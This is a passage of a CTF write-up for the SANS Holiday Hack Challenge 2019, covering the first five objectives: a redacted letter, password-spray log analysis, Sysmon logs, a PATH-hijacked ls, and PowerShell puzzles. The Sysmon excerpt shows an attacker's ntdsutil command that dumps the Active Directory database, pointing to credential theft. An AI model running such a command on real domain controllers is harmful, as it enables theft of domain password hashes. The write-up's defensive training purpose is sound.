index.html

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="keywords" content="HHC, Holiday Hack Challenge, 2019, writeup, SANS">
  <link rel="stylesheet" href="css/sans_19.css">
  <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
  <title>Holiday Hack Challenge 2019</title>
</head>
<body>
<div id="toc">
  <h2>Table of Contents</h2>
  <h3><a href="#intro">Introduction</a></h3>
  <h3><a href="#obj01">Objective 1</a></h3>
  <ul>
    <li><a href="#obj01">Turtle Doves</a></li>
  </ul>
  <h3><a href="#obj02">Objective 2</a></h3>
  <ul>
    <li><a href="#obj02">Unredact Threatening Document</a></li>
  </ul>
  <h3><a href="#obj03">Objective 3</a></h3>
  <ul>
    <li><a href="#obj03_1">Bushy Evergreen</a></li>
    <li><a href="#obj03_2">Evaluate Attack Outcome</a></li>
  </ul>
  <h3><a href="#obj04">Objective 4</a></h3>
  <ul>
    <li><a href="#obj04_1">Sugarplum Mary</a></li>
    <li><a href="#obj04_2">Determine Attacker Technique</a></li>
  </ul>
  <h3><a href="#obj05">Objective 5</a></h3>
  <ul>
    <li><a href="#obj05_1">Sparkle Redberry</a></li>
    <li><a href="#obj05_2">Determine Compromised System</a></li>
  </ul>
  <h3><a href="#obj06">Objective 6</a></h3>
  <ul>
    <li><a href="#obj06">Prof. Banas: Splunk</a></li>
  </ul>
  <h3><a href="#obj07">Objective 7</a></h3>
  <ul>
    <li><a href="#obj07_1">Access Dorms</a></li>
    <li><a href="#obj07_2">Minty Candycane</a></li>
    <li><a href="#obj07_3">Access Steam Tunnels</a></li>
  </ul>
  <h3><a href="#obj08">Objective 8</a></h3>
  <ul>
    <li><a href="#obj08_1">Alabaster Snowball</a></li>
    <li><a href="#obj08_2">Bypass Frido Sleigh CAPTEHA</a></li>
  </ul>
  <h3><a href="#obj09">Objective 9</a></h3>
  <ul>
    <li><a href="#obj09_1">Pepper Minstix</a></li>
    <li><a href="#obj09_2">Retrieve Scraps from Server</a></li>
  </ul>
  <h3><a href="#obj10">Objective 10</a></h3>
  <ul>
    <li><a href="#obj10_1">Holly Evergreen</a></li>
    <li><a href="#obj10_2">Recover Cleartext Document</a></li>
  </ul>
  <h3><a href="#obj11">Objective 11</a></h3>
  <ul>
    <li><a href="#obj11_1">Kent Tinseltooth</a></li>
    <li><a href="#obj11_2">Open Sleigh Shop Door</a></li>
  </ul>
  <h3><a href="#obj12">Objective 12</a></h3>
  <ul>
    <li><a href="#obj12_1">Wunorse Openslae</a></li>
    <li><a href="#obj12_2">Filter Weather Data</a></li>
  </ul>
  <h3><a href="#epilogue">Epilogue</a></h3>
</div>
<div id="writeup">
  <h1 style="text-align: center;" id="intro">Holiday Hack Challenge 2019</h1>
  <div id="headline">
    <div><img src="img/intro/avatar.png" height="250px"></div>
    <div><img src="img/intro/elfu.png"></div>
    <div style="margin-left: 40px;"><img src="img/intro/gobear.gif" height="150px"></div>   
  </div>
  <h2 style="text-align: center;">KringleCon 2: Turtle Doves</h2>
  <h2 style="text-align: center;">Writeup by Kumaus</h2>
  <p>
    Who can say no to an invitation to visit Santa at Elf University during KringleCon 2? 
    This is my first real attempt at a Holiday Hack Challenge, after some off-line 
    experimentation with the older challenges to learn the ropes (excellent resource!!!).
    Bags were packed in a rush, I hopped on the famous North Pole train and arrived 
    after an arduous journey at ELFU railway station.
  </p>
  <div class="quote"> 
    <div class="name">Santa:</div>
    Welcome to the North Pole and KringleCon 2! <br>
    Last year, KringleCon hosted over 17,500 attendees and my castle got a little crowded.
    We moved the event to Elf University (Elf U for short), the North Pole’s largest venue.
    Please feel free to explore, watch talks, and enjoy the con!
  </div>
  <p></p>
  <img src="img/intro/me_and_Santa.png" class="centered">
  <p>
    After a warm welcome by Santa himself, I started having a hop around Elf University.
    In the main quad, I bumped into Santa again, who had a matter of some urgency to discuss.
  </p>
  <div class="quote">
    <div class="name">Santa:</div>
    This is a little embarrassing, but I need your help.<br>
    Our KringleCon turtle dove mascots are missing!<br>
    They probably just wandered off. Can you please help find them?
    To help you search for them and get acquainted with KringleCon, I’ve created some 
    objectives for you. You can see them in your badge.
    Where's your badge? Oh! It's that big, circle emblem on your chest - give it a tap!
    We made them in two flavors - one for our new guests, and one for those 
    who've attended both KringleCons. <br>
    After you find the Turtle Doves and complete 
    objectives 2-5, please come back and let me know. Not sure where to start? 
    Try hopping around campus and talking to some elves. If you help my elves with 
    some quicker problems, they'll probably remember clues for the objectives.
  </div>
  <p>
    This is the beginning of a long wild dove chase ... 
  </p>
  <img src="img/intro/map.PNG" class="centered" width="900px">
  <p>
    The map shows a rough representation of ELFU campus and where the elves can be found. 
    Red passages are not open initially and require something to be done. The gray pathways 
    are the fast underground steam tunnel links which become available after helping 
    Krampus get his lifetime cookie supply in objective 8.
  </p>
  <div class="note"> 
    After the event, I added notes such as this 
    one to indicate improvements and further insights taken from Andy Smith's excellent
    <a href="https://www.youtube.com/watch?v=M0_E4Iaj-v4&list=PLoEpvlpUwwkY3j0GzACuudBuhLNi8XW4B&index=1">
      video walkthrough</a>.
    </div>

  <h2 id="obj01">Objective 1: Turtle Doves</h2>
  <div class="objective">
    Find the missing turtle doves.
  </div>
  <p>
    After wandering around the university for a littl ewhile trying to get my bearing, 
    I naturally ended up in the Student Union for a beer and a warm fire. To my great 
    disappointment, beer was not available, just T-shirts, Splunk, Google and a strange booth 
    labelled SANS. Sans beer, je pense ... but at least there was a fireplace. And next to 
    the roaring fire, the two missing turtle doves were sitting, enjoying themselves. 
    Great sense, actually, finding a cozy place instead of freezing their feet next to 
    Santa in the arctic quad. I can really understand why they ran away. Got to break it 
    to Santa now.
  </p>
  <img src="img/obj_01/turtle_doves.png" class="centered">

  <h2 id="obj02">Objective 2: Unredact Threatening Document</h2>
  <div class="objective">
    Difficulty:1<br>
    Someone sent a threatening letter to Elf University. 
    What is the first word in ALL CAPS in the subject line 
    of the letter? Please find the letter in the Quad.
  </div>
  <p>
    The letter is hidden behind a tree in the upper left corner of the quad (I know "upper"
    sounds completely wrong, but one can hardly say northwestern corner ... after all this is 
    the north pole). 
  </p>
  <div style="text-align: center;">
    <img src="img/obj_02/letter.png" height="250px">
    <img src="img/obj_02/redacted.png" height="270px">
  </div>
  <p>
    The letter was poorly redacted by placing a graphic as a layer above it, making the 
    text invisible. With proper PDF manipulation tools one can remove the obstructing 
    images. But the simplest way is to save the document as text 
    (File &rarr; Save as other &rarr; Text in the Acrobat Reader).
  </p>
  <pre>

    Date: February 28, 2019 

    To the Administration, Faculty, and Staff of Elf University 
    17 Christmas Tree Lane 
    North Pole 

    From: A Concerned and Aggrieved Character 

    Subject: DEMAND: Spread Holiday Cheer to Other Holidays and Mythical Characters… OR 
    ELSE! 
    Confidential 
    Attention All Elf University Personnel, 


    It remains a constant source of frustration that Elf University and the entire operation at the 
    North Pole focuses exclusively on Mr. S. Claus and his year-end holiday spree. We URGE 
    you to consider lending your considerable resources and expertise in providing merriment, 
    cheer, toys, candy, and much more to other holidays year-round, as well as to other mythical 
    characters. 
    For centuries, we have expressed our frustration at your lack of willingness to spread your 
    cheer beyond the inaptly-called “Holiday Season.” There are many other perfectly fine 
    holidays and mythical characters that need your direct support year-round. 
    Confidential 
    If you do not accede to our demands, we will be forced to take matters into our own hands. 
    We do not make this threat lightly. You have less than six months to act demonstrably. 
    Sincerely, 
    --A Concerned and Aggrieved Character 

  </pre>
  <div class="answer"><b>Answer</b>: DEMAND</div>

  <h2 id="obj03">Objective 3: Windows Log Analysis - Evaluate Attack Outcome</h2 id="obj03">
  <div class="objective">
    Difficulty:1<br>
    We're seeing attacks against the Elf U domain! Using 
    <a href="https://downloads.elfu.org/Security.evtx.zip">the event log data</a>, 
    identify the user account that the attacker compromised using a password 
    spray attack. 
    <em>
      Bushy Evergreen is hanging out in the train station and may 
      be able to help you out. 
    </em>
  </div>

  <h3 id="obj03_1">I) Help Bushy Evergreen</h3>
  <div class="terminal">
    <img src="img/obj_03/bushy_solve.png">
  </div>
  <div class="quote">
    <div class="name">Bushy Evergreen:</div>
    Hi, I'm Bushy Evergreen. Welcome to Elf U!
    I'm glad you're here. I'm the target of a terrible trick.
    Pepper Minstix is at it again, sticking me in a text editor.
    Pepper is forcing me to learn ed.
    Even the hint is ugly. Why can't I just use Gedit?
    Please help me just quit the grinchy thing.
  </div>
  <div class="hint">
    &xrarr;
    <a href="http://cs.wellesley.edu/~cs249/Resources/ed_is_the_standard_text_editor.html">ed Editor Basics</a>
  </div>
  <p>
    Truth be told, I had completely forgotten about ed and the terrible mess one can 
    get into while trying to escape the thing. To help Bushy and get out, simply enter "q" 
    to quit or "wq" to write and quit.
  </p>
  <div class="quote">
    <div class="name">Bushy Evergreen:</div>
    Wow, that was much easier than I'd thought.
    Maybe I don't need a clunky GUI after all!
    Have you taken a look at the password spray attack artifacts?
    I'll bet that DeepBlueCLI tool is helpful.
    You can check it out on GitHub.
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://www.ericconrad.com/2016/09/deepbluecli-powershell-module-for-hunt.html">Eric Conrad on DeepBlueCLI</a>
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://github.com/sans-blue-team/DeepBlueCLI">Github page for DeepBlueCLI</a>
  </div>
  <h3 id="obj03_2">II) Windows Log Analysis - Evaluate Attack Outcome</h3>
  <p>
    We are looking for evidence of a <b>password spray attack</b>, which can be defined 
    as <em>applying the same password to multiple user accounts in an organization to 
    secure unauthorized access to one of those accounts.</em> As evidence we are given 
    a file <b>Security.evtx</b> containing security channel event logs from Windows:
    privilege allocations, login, logoff, etc. 
    For some background on Windows event logging and .evtx files, here is a 
    <a href="https://www.sans.org/reading-room/whitepapers/logging/evtx-windows-event-logging-32949">paper by Brandon Charter</a>
    on the topic.
  </p>
  <p>
    Security.evtx can be opened directly with the Windows Event Viewer, 
    which can show individual logs and do basic filtering, but the analysis is quite 
    unpleasant. <b>DeepBlueCLI</b> is a command line tool which correlates the events 
    and draws conclusions. Invoking it on Security.evtx gives following output:
  </p>
  <pre>
  Date    : 19.11.2019 13:22:46
  Log     : Security
  EventID : 4648
  Message : Distributed Account Explicit Credential Use (<mark>Password Spray Attack</mark>)
  Results : The use of multiple user account access attempts with explicit credentials is an indicator of a password spray attack.
            Target Usernames: ygoldentrifle esparklesleigh hevergreen Administrator sgreenbells cjinglebuns tcandybaubles bbrandyleaves bevergreen
            lstripyleaves gchocolatewine wopenslae ltrufflefig supatree mstripysleigh pbrandyberry civysparkles sscarletpie ftwinklestockings
            cstripyfluff gcandyfluff smullingfluff hcandysnaps mbrandybells twinterfig civypears ygreenpie ftinseltoes smary ttinselbubbles
            dsparkleleaves
            Accessing Username: -
            Accessing Host Name: -
  
  [... 11 more]
        
  Date    : 24.08.2019 02:00:20
  Log     : Security
  EventID : 4672
  Message : Multiple admin logons for one account
  Results : Username: pminstix
            User SID Access Count: 2

  Date    : 24.08.2019 02:00:20
  Log     : Security
  EventID : 4672
  Message : Multiple admin logons for one account
  Results : Username: DC1$
            User SID Access Count: 12

  Date    : 24.08.2019 02:00:20
  Log     : Security
  EventID : 4672
  Message : <mark>Multiple admin logons for one account</mark>
  Results : Username: <mark>supatree</mark>
            User SID Access Count: 2

  Date    : 24.08.2019 02:00:20
  Log     : Security
  EventID : 4672
  Message : High number of logon failures for one account
  Results : Username: ygoldentrifle
            Total logon failures: <mark>77</mark>
  
  [... 29 more]

  Date    : 24.08.2019 02:00:20
  Log     : Security
  EventID : 4672
  Message : High number of logon failures for one account
  Results : Username: <mark>supatree</mark>
            Total logon failures: <mark>76</mark>
  
  Date    : 24.08.2019 02:00:20
  Log     : Security
  EventID : 4672
  Message : High number of total logon failures for multiple accounts
  Results : Total accounts: <mark>31</mark> 
            Total logon failures: 2386
  </pre>
  <p>
    The analysis shows that a password spray attack has definitely taken place, and 
    that 31 accounts were affected. User supatree shows 76 failures and two 
    successful admin logons, whereas all others show 77 failures. This makes 
    it very likely that the <b>supatree</b> account was compromised. The other 
    elf with admin logons, pminstix, did not appear in the password spray attack.
  </p>
  <div class="answer"><b>Answer</b>: supatree</div>

  <h2 id="obj04">Objective 4: Windows Log Analysis - Determine Attacker Technique</h2 id="obj04">
  <div class="objective">
    Difficulty:2<br>
    Using <a href="https://downloads.elfu.org/sysmon-data.json.zip">these normalized Sysmon logs</a>, 
    identify the tool the attacker used to retrieve domain password hashes 
    from the lsass.exe process. 
    <em>
      For hints on achieving this objective, 
      please visit Hermey Hall and talk with SugarPlum Mary.
    </em>
  </div>
  <h3 id="obj04_1">I) Help SugarPlum Mary</h3>
  <img src="img/obj_04/sugarplum_terminal.png" style="float:right; width:500px; padding-left:10px;">
  <div class="quote">
    <div class="name">SugarPlum Mary:</div>
    Oh me oh my - I need some help!<br>
    I need to review some files in my Linux terminal, but I can't get a file listing.
    I know the command is ls, but it's really acting up.
    Do you think you could help me out? As you work on this, 
    think about these questions:
    <ol>
      <li>Do the words in green have special significance?</li>
      <li>How can I find a file with a specific name?</li>
      <li>What happens if there are multiple executables with the same name in my $PATH?</li>
    </ol>
  </div>
  <div class="hint">
    &xrarr;
    <div>
      Linux Path: Green words matter, files must be found, and the terminal's $PATH matters.
    </div>
  </div>
  <p>
    The ls command is definitely acting up!<br>
    The green words in the terminal are useful basic linux commands which may help 
    in the search for ls:
  </p>
  <table class="bordered">
    <tr><td>file</td> <td>determine filetype</td> </tr>
    <tr><td>home/</td> <td>path of user folders</td></tr>
    <tr><td>which</td> <td>list filepath of command executabless</td></tr>
    <tr><td>find</td> <td>search through folder hierarchy</td></tr>
    <tr><td>path</td> <td>$PATH contains the search order of the shell</td></tr>
    <tr><td>locate</td> <td>similar to find, may be faster</td></tr>
  </table>
  <pre>
elf@acc7e121d80e:~$ <span>which ls</span>
<mark>/usr/local/bin/ls</mark>
elf@acc7e121d80e:~$ <span>file /usr/local/bin/ls</span>
/usr/local/bin/ls: Bourne-Again shell script, ASCII text executable, with escape sequences
elf@acc7e121d80e:~$ <span>find / -name ls</span>
<mark>/usr/local/bin/ls</mark>
find: '/root': Permission denied
find: '/var/cache/apt/archives/partial': Permission denied
find: '/var/cache/ldconfig': Permission denied
find: '/var/lib/apt/lists/partial': Permission denied
<mark>/bin/ls</mark>
find: '/proc/tty/driver': Permission denied
find: '/proc/1/task/1/fd': Permission denied
find: '/proc/1/task/1/fdinfo': Permission denied
find: '/proc/1/task/1/ns': Permission denied
find: '/proc/1/fd': Permission denied
find: '/proc/1/map_files': Permission denied
find: '/proc/1/fdinfo': Permission denied
find: '/proc/1/ns': Permission denied
find: '/proc/6/task/6/fd': Permission denied
find: '/proc/6/task/6/fdinfo': Permission denied
find: '/proc/6/task/6/ns': Permission denied
find: '/proc/6/fd': Permission denied
find: '/proc/6/map_files': Permission denied
find: '/proc/6/fdinfo': Permission denied
find: '/proc/6/ns': Permission denied
find: '/etc/ssl/private': Permission denied
elf@acc7e121d80e:~$ <span>echo $PATH</span>
<mark>/usr/local/bin</mark>:/usr/bin:<mark>/bin</mark>:/usr/local/games:/usr/games
elf@1255f6dd0ad9:~$ <mark><span>/bin/ls</span></mark>
' '   rejected-elfu-logos.txt
Loading, please wait......

You did it! Congratulations!
  </pre>
  <p>
    The commands <code>which</code> and <code>file</code> show that the shell 
    search path leads first to a shellscript named ls in <code>/usr/local/bin</code>.
    This underlines just how important a sanitized <code>$PATH</code> is! The "real"
    ls command can be determined using <code>find</code> if necessary, and invoking 
    it with the full path <code>/bin/ls</code> solves SugarPlums problem. As a bonus:
  </p>
  <img src="img/obj_04/elfu_logos.png" width="500px" class="centered">
  <p>some rejected ELFU logos SugarPlum has been playing with can be gleaned.</p>
  <div class="quote">
    <div class="name">SugarPlum Mary:</div>
    <div>
      Oh there they are! Now I can delete them. Thanks! <br>
      Have you tried the Sysmon and EQL challenge?
      If you aren't familiar with Sysmon, Carlos Perez has some great info about it.
      Haven't heard of the Event Query Language?
      Check out some of <a href="https://www.endgame.com/our-experts/ross-wolf">Ross Wolf's work</a> 
      on EQL or that blog post by Josh Wright in your badge.     
    </div>
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://www.darkoperator.com/blog/2014/8/8/sysinternals-sysmon">Sysmon</a>
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://pen-testing.sans.org/blog/2019/12/10/eql-threat-hunting/">Event Query Language</a>
  </div>

  <h3 id="obj04_2">II) Windows Log Analysis - Determine Attacker Technique</h3>
  <p>
    The hint on Event Query Language by SugarPlum Mary leads to an excellent explanation of 
    this powerful command line tool, complete with abundant example files. However, just to
    solve the objective, all this is not really necessary. We are asked to identify a tool 
    used to get data from the lsass process, so I did a simple text search of sysmon-data.json 
    for <b>lsass.exe</b>. Only one record matched, with process ID 3440. The next record 
    timewise features a child process of this (ppid = 3440): <b>ntdsutil.exe</b>.
  </p>
  <pre>
    {
      "command_line": "C:\\Windows\\system32\\cmd.exe",
      "event_type": "process",
      "logon_id": 999,
      "parent_process_name": "<mark>lsass.exe</mark>",
      "parent_process_path": "C:\\Windows\\System32\\lsass.exe",
      "pid": <mark>3440</mark>,
      "ppid": 632,
      "process_name": "cmd.exe",
      "process_path": "C:\\Windows\\System32\\cmd.exe",
      "subtype": "create",
      "timestamp": 132186398356220000,
      "unique_pid": "{7431d376-dedb-5dd3-0000-001027be4f00}",
      "unique_ppid": "{7431d376-cd7f-5dd3-0000-001013920000}",
      "user": "NT AUTHORITY\\SYSTEM",
      "user_domain": "NT AUTHORITY",
      "user_name": "SYSTEM"
    },
    {
      "command_line": "ntdsutil.exe  \"ac i ntds\" ifm \"create full c:\\hive\" q q",
      "event_type": "process",
      "logon_id": 999,
      "parent_process_name": "cmd.exe",
      "parent_process_path": "C:\\Windows\\System32\\cmd.exe",
      "pid": 3556,
      "ppid": <mark>3440</mark>,
      "process_name": "ntdsutil.exe",
      "process_path": "<mark>C:\\Windows\\System32\\ntdsutil.exe</mark>",
      "subtype": "create",
      "timestamp": 132186398470300000,
      "unique_pid": "{7431d376-dee7-5dd3-0000-0010f0c44f00}",
      "unique_ppid": "{7431d376-dedb-5dd3-0000-001027be4f00}",
      "user": "NT AUTHORITY\\SYSTEM",
      "user_domain": "NT AUTHORITY",
      "user_name": "SYSTEM"
    }</pre>
  <p>
    A nice explanation of how the command 
    <code>ntdsutil.exe  "ac i ntds" ifm "create full c:\\hive\" q q</code> is used to 
    pull credentials can be found in <a href="https://adsecurity.org/?p=2398#CreateIFM">this blog</a>.
  </p>
  <div class="answer"><b>Answer</b>: ntdsutil</div>

  <h2 id="obj05">Objective 5: Windows Log Analysis - Determine Compromised System</h2 id="obj05">
  <div class="objective">
    Difficulty:2<br>
    The attacks don't stop! Can you help identify the IP address 
    of the malware-infected system using these 
    <a href="https://downloads.elfu.org/elfu-zeeklogs.zip">Zeek logs</a>? 
    <em>
      For hints on achieving this objective, please visit the Laboratory 
      and talk with Sparkle Redberry.
    </em>
  </div>
  <h3 id="obj05_1">I) Help Sparkle Redberry</h3>
  <div class="terminal">
    <img src="img/obj_05/laser.png">
    <img src="img/obj_05/laser_api.png">
  </div>
  <div class="quote">
    <div class="name">Sparkle Redberry:</div>
    I'm Sparkle Redberry and Imma chargin' my laser!
    Problem is: the settings are off.
    Do you know any PowerShell?
    It'd be GREAT if you could hop in and recalibrate this thing.
    It spreads holiday cheer across the Earth ...<br>
    ... when it's working!        
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://blogs.sans.org/pen-testing/files/2016/05/PowerShellCheatSheet_v41.pdf">PowerShell Cheat Sheet</a>
  </div>
  <p>
    For me, this was easily the hardest elf terminal challenge. PowerShell is 
    a powerfull, but initially counterintuitive language which took some getting 
    used to. The cheat sheet provided in the hint was a huge help!
  </p>
  <p>
    Starting with the calling card, a trail of hints leads to settings for 
    <b>angle</b>, <b>refraction</b>, <b>temperature</b> and <b>gas mixture</b>
    in the laser API.
    The calling card can be read by <code>Get-Content /home/callingcard.txt</code>:
  </p>
  <div class="framed">
    What's become of your dear laser?<br>
    Fa la la la la, la la la la<br>
    Seems you can't now seem to raise her!<br>
    Fa la la la la, la la la la<br>
    Could commands hold riddles in hist'ry?<br>
    Fa la la la la, la la la la<br>
    Nay! You'll ever suffer myst'ry!<br>
    Fa la la la la, la la la la
  </div>
  <pre>
PS /home/elf&gt; <span>Get-History</span>
    Id CommandLine
    -- -----------
     1 Get-Help -Name Get-Process 
     2 Get-Help -Name Get-* 
     3 Set-ExecutionPolicy Unrestricted 
     4 Get-Service | ConvertTo-HTML -Property Name, Status > C:\services.htm 
     5 Get-Service | Export-CSV c:\service.csv 
     6 Get-Service | Select-Object Name, Status | Export-CSV c:\service.csv 
     7 <mark>(Invoke-WebRequest http://127.0.0.1:1225/api/angle?val=65.5).RawContent</mark>
     8 Get-EventLog -Log "Application" 
     9 I have many <mark>name=value variables</mark> that I share to applications system wide. 
       At a command I will reveal my secrets once you <mark>Get my Child Items</mark>.
  </pre>
  <p>
    The command history spits out the first parameter, <b>angle = 65.5</b>, and also gives
    the exact format required to feed the laser API (ignoring this cost me a lot of 
    time later). Id 9 contains a long line of text giving the next hint. Because 
    Get-History truncates long lines in its plain form, I used 
    <code>Get-History | Format-List CommandLine</code> to see everything (adapted 
    in the listing above). It is interesting that the command history also 
    includes <code>Get-Service</code> calls, trying to write the results to C:\.
    However, <code>Get-Service</code> seems to be blocked on this terminal, 
    C:\ does not exist (unix file system) and *.csv cannot be found. Strange ... 
    a red herring maybe?
  </p>
  <p>
    The line with ID 9 poses a riddle hinting at <b>environment variables</b> 
    (name=value pairs, shared with systemwide applications). In PowerShell, they 
    are kept in <code>Env:</code>, which functions as a kind of drive. 
    The second half of the riddle tells to access them via the command 
    <code>Get-ChildItem</code>, or <code>gci</code> in short:
  </p>
  <pre>
PS /home/elf&gt; <span>gci Env:</span>         
    Name                           Value
    ----                           -----
    _                              /bin/su
    DOTNET_SYSTEM_GLOBALIZATION_I… false
    HOME                           /home/elf
    HOSTNAME                       038aefb857b4
    LANG                           en_US.UTF-8
    LC_ALL                         en_US.UTF-8
    LOGNAME                        elf
    MAIL                           /var/mail/elf
    PATH                           /opt/microsoft/powershell/6:/usr/local/sbin:/usr/local/bi…
    PSModuleAnalysisCachePath      /var/cache/microsoft/powershell/PSModuleAnalysisCache/Mod…
    PSModulePath                   /home/elf/.local/share/powershell/Modules:/usr/local/shar…
    PWD                            /home/elf
    RESOURCE_ID                    fe859679-df0b-4c48-af66-a50bd92ede88
    <mark>riddle</mark>                         Squeezed and compressed I am hidden away. Expand me from …
    SHELL                          /home/elf/elf
    SHLVL                          1
    TERM                           xterm
    USER                           elf
    userdomain                     laserterminal
    USERDOMAIN                     laserterminal
    username                       elf
    USERNAME                       elf</pre>
  <p>
    The next riddle! To get the full line, use <code>Get-Content</code> or 
    <code>gc</code> in short:
  </p>
  <pre>
PS /home/elf&gt; <span>gc Env:riddle</span>
    Squeezed and compressed I am hidden away. Expand me from my prison and I will show 
    you the way. Recurse through all <mark>/etc</mark> and Sort on my <mark>LastWriteTime</mark> to reveal im the
    newest of all.    
  </pre>
  <p>
    "squeezed and compressed" probably means an archive. To find the most recent item 
    in /etc and its subdirectories, several commands have to be linked by pipes:
  </p>
  <table class="bordered">
    <tr><td><code>gci /etc -recurse</code></td><td>List /etc and all its subdirectories</td></tr>
    <tr><td><code>| sort LastWriteTime -Descending</code></td><td>Sort by last writing time, most recent first</td></tr>
    <tr><td><code>| select -First 1</code></td><td>Filter first item on list</td></tr>
  </table>
  <pre>
PS /home/elf> <span>gci /etc -recurse | sort LastWriteTime -Descending | select -First 1</span>
     
        Directory: /etc/apt
    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    --r---            1/9/20  1:19 PM        5662902 archive</pre>
  <p>
    leaving out error messages caused by missing access rights. 
    A powershell archive called archive, how nice. To expand it into 
    the home directory, use the command <code>Expand-Archive</code>. 
    The parameter <code>-PassThru</code> causes the archive contents to be printed.
  </p>
  <pre>
PS /home/elf> <span>Expand-Archive /etc/apt/archive -PassThru -DestinationPath .</span>

        Directory: /home/elf
    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    d-----            1/9/20  2:16 PM                refraction
        Directory: /home/elf/refraction
    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    ------           11/7/19 11:57 AM            134 <mark>riddle</mark>
    ------           11/5/19  2:26 PM        5724384 <mark>runme.elf</mark></pre>
  <p>
    Trying to run <b>runme.elf</b> fails, and looking at the directory listing 
    shows why: execution privileges are not set (no privileges at all, actually).
    But how to set them in PowerShell? Theoretically there is a command 
    <code>Set-Acl</code> to do this, but that is not recognized by the terminal.
    Maybe luckily, because PowerShell access right management looks like an 
    advanced form of medieval torture. Not for the faint-hearted! Instead, 
    as I found out by trial and error, the terminal appears to accept the linux 
    <code>chmod</code> command! This does not really make sense, because chmod is 
    not listed as a PS alias (<code>Get-Alias</code>), and it certainly 
    does not work on my Win10 PowerShell. 
  </p>
  <pre>
PS /home/elf/refraction> <span>./runme.elf</span>                                              
    <mark>Program 'runme.elf' failed to run</mark>: No such file or directoryAt line:1 char:1       
    + ./runme.elf                                                                      
    + ~~~~~~~~~~~.                                                                     
    At line:1 char:1
    + ./runme.elf
    + ~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed
    
PS /home/elf/refraction> <span>chmod 777 runme.elf</span>
PS /home/elf/refraction> <span>./runme.elf</span>        
    <mark>refraction?val=1.867</mark>
PS /home/elf/refraction> <span></span>gci .
        Directory: /home/elf/refraction
    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    ------           11/7/19 11:57 AM            134 riddle
    <mark>------</mark>           11/5/19  2:26 PM        5724384 runme.elf
PS /home/elf/refraction> <span>gc riddle</span>
    Very <mark>shallow</mark> am I in the <mark>depths</mark> of your <mark>elf home</mark>. You can find my entity by 
    using my <mark>md5 identity</mark>:
    25520151A320B5B0D21561F92C8F6224</pre>
  <p>
    After the chmod, a directory listing shows no change to permissions, but 
    running the file runme.elf magically works. Ours is not to question why,
    ours is to do and help Santa. Lets take <b>refraction=1.867</b> and move on.
  </p>
  <p>
    The next riddle clearly refers to the aptly named folder <b>depths</b> in 
    /home/elf. It is a monster! A deep tree of folders, with many different files. 
    I cheated a bit here, simply searched for files containing an equal sign 
    in the text, and got lucky:
  </p>
  <pre>
PS /home/elf> <span>gci depths -r -force | sls -pattern =</span>       
    depths/produce/thhy5hll.txt:1:temperature?val=-33.5</pre>
  <p>
    This command recursively (<code>-r</code>) lists the contents of depth and all its 
    subfolders, including hidden files (<code>-force</code>) just in case. 
    <code>sls</code> is shorthand for <code>Select-String</code>, which searches 
    for a pattern. 
  </p>
  <p>
    A more honest approach would have been to divine from the hint that target 
    is very shallow in the directory tree, i.e. at depth 1. A gci at depth 1 
    can be done by <code>gci depths | ForEach-Object {gci $_ -File}</code>,
    where each folder within depths is listed (excluding all files in depths).
    The results are subjected to a <code>Where-Object</code> condition (shorthand ? 
    or where) testing for the correct MD5 hash. Surprisingly, this works too:
  </p>
  <pre>
PS /home/elf> <span>gci depths | ForEach-Object {gci $_ -File} 
              | where {(Get-FileHash $_ -Algorithm MD5).Hash -eq '25520151A320B5B0D21561F92C8F6224'}</span>

        Directory: /home/elf/depths/produce
    Mode                LastWriteTime         Length Name
    ----                -------------         ------ ----
    --r---          11/18/19  7:53 PM            224 thhy5hll.txt    
PS /home/elf> <span>gc ./depths/produce/thhy5hll.txt</span>
    <mark>temperature?val=-33.5</mark>

    I am one of many thousand similar txt's contained within the <mark>deepest of</mark> 
    <mark>/home/elf/depths</mark>. Finding me will give you the most strength but doing 
    so will require <mark>Piping all the FullName's</mark> to <mark>Sort Length</mark>.</pre>
  <div class="note">
    One could also forego the hint and do a full recursion, which is a little simpler:
    <pre>
PS /home/elf> <span>dir *.txt -Recurse | Get-FileHash -Algorithm MD5  
              | where {$_.Hash -eq '25520151A320B5B0D21561F92C8F6224'} | Format-Table -Wrap</span></pre>
  </div>
  <p>
    The third parameter is found: <b>temperature=-33.5</b>. And yet another hint, 
    leading into the deepest murky depths of depths. Starting from a recursive 
    listing of depths, the <b><code>FullName</code></b> property of each file 
    (including the complete path) is accessed by 
    <code>gci -Directory -r | select  FullName</code>.
    The <code>-ExpandProperty</code> parameter insures that the output is 
    just the FullName strings rather than file objects. Also, the recursion 
    is limited to directories in order to improve speed.
  </p>
  <pre>
PS /home/elf> <span>gci -Directory -r | select -ExpandProperty FullName 
              | sort length -descending | select -First 1</span>
    /home/elf/depths/larger/cloud/behavior/beauty/enemy/produce/age/chair/unknown/escap
    e/vote/long/writer/behind/ahead/thin/occasionally/explore/tape/wherever/practical/t
    herefore/cool/plate/ice/play/truth/potatoes/beauty/fourth/careful/dawn/adult/either
    /burn/end/accurate/rubbed/cake/main/she/threw/eager/trip/to/soon/think/fall/is/grea
    test/become/accident/labor/sail/dropped/fox</pre>
  <p>
    Piping the resulting list of full path names to <code>sort</code> in order to
    find the longest leads to a really huge folder path. This contains only a single 
    text file, <b>0jhj5xz6.txt</b>:
  </p>
  <pre>
    Get <mark>process information</mark> to include <mark>Username</mark> identification. 
    Stop Process to show me you're skilled and in this order they must be <mark>killed</mark>:
        bushy
        alabaster
        minty
        holly
    Do this for me and then you <mark>/shall/see</mark> .
  </pre>
  <p>
    Currently, the folder <b>/shall</b> exists, but is empty. So let's 
    follow instructions, list all active processes including user name and
    kill the sleeping elf processes in the desired order. After the gruesome 
    deed, the /shall folder is no longer empty:
  </p>
  <pre>
PS /home/elf> <span>gci /shall</span>
PS /home/elf> <span>Get-Process -IncludeUserName</span>
    WS(M)   CPU(s)      Id UserName                       ProcessName
    -----   ------      -- --------                       -----------
